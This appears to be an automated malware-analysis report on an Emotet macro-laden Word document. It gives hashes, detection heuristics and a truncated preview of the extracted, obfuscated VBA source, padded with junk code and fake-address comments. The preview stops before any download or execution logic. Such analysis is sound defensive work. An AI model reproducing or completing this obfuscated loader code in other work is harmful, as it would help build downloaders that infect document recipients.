Emotet Office (OLE) malware analysis — malicious · b9ff09f2a5cc4417

MALICIOUS

Office (OLE)

240.0 KB Created: 2019-10-10 00:27:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: f084494b91e1d61052b8f04de0045c9e SHA-1: 03ad9704247a2dc3a49274eb2d1aacdb1bff5576 SHA-256: b9ff09f2a5cc441790c6577f731c756ea95af9961e44cf41af17deaa10e18df5

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7331191-0. Heuristics indicate the presence of obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks. This strongly suggests the macro's purpose is to download and execute a second-stage payload, a common Emotet behavior.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-7331191-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7331191-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 65888 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	65888 bytes
SHA-256: `d8506db8f7500b2b58459108bfa93a98d0a5d724cfc18f77baa0f09ca11ed9fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b0957x04x7x0" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "c60c40b06850, 0, 0, MSForms, TextBox" Attribute VB_Control = "b0cx7b767624, 1, 1, MSForms, TextBox" Attribute VB_Control = "b791c8040790, 2, 2, MSForms, TextBox" Attribute VB_Control = "x03091840x0, 3, 3, MSForms, TextBox" Attribute VB_Control = "c23c8080000, 4, 4, MSForms, TextBox" Attribute VB_Control = "b3x410931807c, 5, 5, MSForms, TextBox" Attribute VB_Name = "xb70cb5x1c0" Function b5x80b080031x() On Error Resume Next 'International418 Bergnaum Haven, Elliotthaven, Cayman Islands Dynamic06210 Nolan Fall, Walkerton, Guam xcc570c7699b0 = True 'Regional8738 Monahan Orchard, Fritzhaven, Malaysia Internal462 Nyah Meadow, Ernsermouth, Portugal Select Case b405c027801 'Central182 Connelly Fields, South Dionstad, Swaziland Legacy14914 Skiles Flat, New Sonyamouth, Falkland Islands (Malvinas) Case c7308c60094 'Internal495 Hegmann Court, Lake Moniquemouth, Bolivia Regional18355 Powlowski Track, New Meganebury, Western Sahara 'Investor47562 Delia Walks, West Marleeport, Isle of Man Internal280 Abelardo Wall, East Devanburgh, Fiji xc6053b9c0b1x = False 'District6584 Littel Mill, Gabriellaland, Armenia Customer2890 Bernier Crossing, Murphytown, Burundi b5849b9040494 = b7650cb030b3 'Chief256 Jonas Flat, Conroyshire, Russian Federation Product1305 Nader Terrace, East Brandyn, Bangladesh x084926b0c842 = CInt(x8820268608 - CByte(x7800ccx929c0)) 'Customer5666 Veum Loop, Port Stanford, Singapore Senior9851 Block Knolls, Lake Selina, Spain b060092c4x05 = Cos(x6x0004604b) 'Chief6612 Howe Dale, South Christophefurt, Honduras Forward599 Heller Forges, Lake Carlimouth, Georgia b30c0802940 = True 'Product92447 Rau Road, West Erickaborough, Gibraltar Customer58553 Mose Stream, Hortensehaven, Norway x419b9507083x = Rnd(c0b00800500) 'Principal9494 Ankunding Common, Traceburgh, Cote d'Ivoire Dynamic49254 Mayer Oval, Eraton, Burkina Faso Case c4c2100x2c347 'National295 Schowalter Shoals, East Lisa, Saint Kitts and Nevis Product36108 Glover Pines, East Arturo, Netherlands b20000402083b = cb09b183c1xc7 'Forward6173 Streich Hill, South Yazmin, Trinidad and Tobago International2353 Rogahn Plaza, Nellieview, Cyprus b3512ccb00470 = CDbl(b9563150b600) 'Dynamic11947 O'Reilly Pike, New Rachael, Liberia Global75444 Parker Knoll, West Oda, United States Minor Outlying Islands End Select 'Lead187 Adrien Rue, New Kendrick, Ghana Internal06546 Kuhic Tunnel, Kautzerview, Slovakia (Slovak Republic) c700563002680 = True 'Dynamic46527 Huel Burgs, Hegmannside, Guadeloupe Chief048 Maggie Forest, Maybelleborough, Democratic People's Republic of Korea 'International6519 Green Inlet, West Hildegardport, Sierra Leone Dynamic45997 Predovic Ford, Brianachester, India c40899004807 = False 'Product724 Wilderman Green, Gulgowskimouth, Senegal Corporate81396 Minnie Glens, East Magdalenastad, Montserrat Select Case b56x9b40100x 'Global4545 Rippin Point, Vivianport, Niger Legacy8588 Hyatt Harbors, Friesenhaven, Pitcairn Islands Case c14c7x4708797 'Senior928 Champlin Place, Bechtelarmouth, China Customer72274 Stamm Prairie, East Natalia, United States Minor Outlying Islands 'Chief578 Nicolette Springs, Smithamhaven, Pakistan Global2760 Steuber Crossing, New Bradyview, Svalbard & Jan Mayen Islands x20c08b0807 = False 'Principal2195 Stracke Brooks, Jacobsonton, Aruba National61841 Block Row, East Dawson, Mongolia x00800x127x = c804x600x80 'Human5490 Madie Run, Delphiaview, Northern Mariana Islands Senior108 Nakia Inlet, Lake Cristinafort, Iraq x0402003400 = CInt(b60 ... (truncated)

SHA-256: d8506db8f7500b2b58459108bfa93a98d0a5d724cfc18f77baa0f09ca11ed9fe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b0957x04x7x0"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "c60c40b06850, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b0cx7b767624, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b791c8040790, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x03091840x0, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c23c8080000, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b3x410931807c, 5, 5, MSForms, TextBox"

Attribute VB_Name = "xb70cb5x1c0"
Function b5x80b080031x()
On Error Resume Next
   'International418 Bergnaum Haven, Elliotthaven, Cayman Islands Dynamic06210 Nolan Fall, Walkerton, Guam
xcc570c7699b0 = True
'Regional8738 Monahan Orchard, Fritzhaven, Malaysia Internal462 Nyah Meadow, Ernsermouth, Portugal
Select Case b405c027801
'Central182 Connelly Fields, South Dionstad, Swaziland Legacy14914 Skiles Flat, New Sonyamouth, Falkland Islands (Malvinas)
         Case c7308c60094
         'Internal495 Hegmann Court, Lake Moniquemouth, Bolivia Regional18355 Powlowski Track, New Meganebury, Western Sahara
         'Investor47562 Delia Walks, West Marleeport, Isle of Man Internal280 Abelardo Wall, East Devanburgh, Fiji
xc6053b9c0b1x = False
'District6584 Littel Mill, Gabriellaland, Armenia Customer2890 Bernier Crossing, Murphytown, Burundi
            b5849b9040494 = b7650cb030b3
            'Chief256 Jonas Flat, Conroyshire, Russian Federation Product1305 Nader Terrace, East Brandyn, Bangladesh
            x084926b0c842 = CInt(x8820268608 - CByte(x7800ccx929c0))
            'Customer5666 Veum Loop, Port Stanford, Singapore Senior9851 Block Knolls, Lake Selina, Spain
            b060092c4x05 = Cos(x6x0004604b)
'Chief6612 Howe Dale, South Christophefurt, Honduras Forward599 Heller Forges, Lake Carlimouth, Georgia
b30c0802940 = True
'Product92447 Rau Road, West Erickaborough, Gibraltar Customer58553 Mose Stream, Hortensehaven, Norway
            x419b9507083x = Rnd(c0b00800500)
            'Principal9494 Ankunding Common, Traceburgh, Cote d'Ivoire Dynamic49254 Mayer Oval, Eraton, Burkina Faso
         Case c4c2100x2c347
         'National295 Schowalter Shoals, East Lisa, Saint Kitts and Nevis Product36108 Glover Pines, East Arturo, Netherlands
            b20000402083b = cb09b183c1xc7
            'Forward6173 Streich Hill, South Yazmin, Trinidad and Tobago International2353 Rogahn Plaza, Nellieview, Cyprus
            b3512ccb00470 = CDbl(b9563150b600)
            'Dynamic11947 O'Reilly Pike, New Rachael, Liberia Global75444 Parker Knoll, West Oda, United States Minor Outlying Islands
End Select
'Lead187 Adrien Rue, New Kendrick, Ghana Internal06546 Kuhic Tunnel, Kautzerview, Slovakia (Slovak Republic)
c700563002680 = True
'Dynamic46527 Huel Burgs, Hegmannside, Guadeloupe Chief048 Maggie Forest, Maybelleborough, Democratic People's Republic of Korea
   'International6519 Green Inlet, West Hildegardport, Sierra Leone Dynamic45997 Predovic Ford, Brianachester, India
c40899004807 = False
'Product724 Wilderman Green, Gulgowskimouth, Senegal Corporate81396 Minnie Glens, East Magdalenastad, Montserrat
Select Case b56x9b40100x
'Global4545 Rippin Point, Vivianport, Niger Legacy8588 Hyatt Harbors, Friesenhaven, Pitcairn Islands
         Case c14c7x4708797
         'Senior928 Champlin Place, Bechtelarmouth, China Customer72274 Stamm Prairie, East Natalia, United States Minor Outlying Islands
         'Chief578 Nicolette Springs, Smithamhaven, Pakistan Global2760 Steuber Crossing, New Bradyview, Svalbard & Jan Mayen Islands
x20c08b0807 = False
'Principal2195 Stracke Brooks, Jacobsonton, Aruba National61841 Block Row, East Dawson, Mongolia
            x00800x127x = c804x600x80
            'Human5490 Madie Run, Delphiaview, Northern Mariana Islands Senior108 Nakia Inlet, Lake Cristinafort, Iraq
            x0402003400 = CInt(b60
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.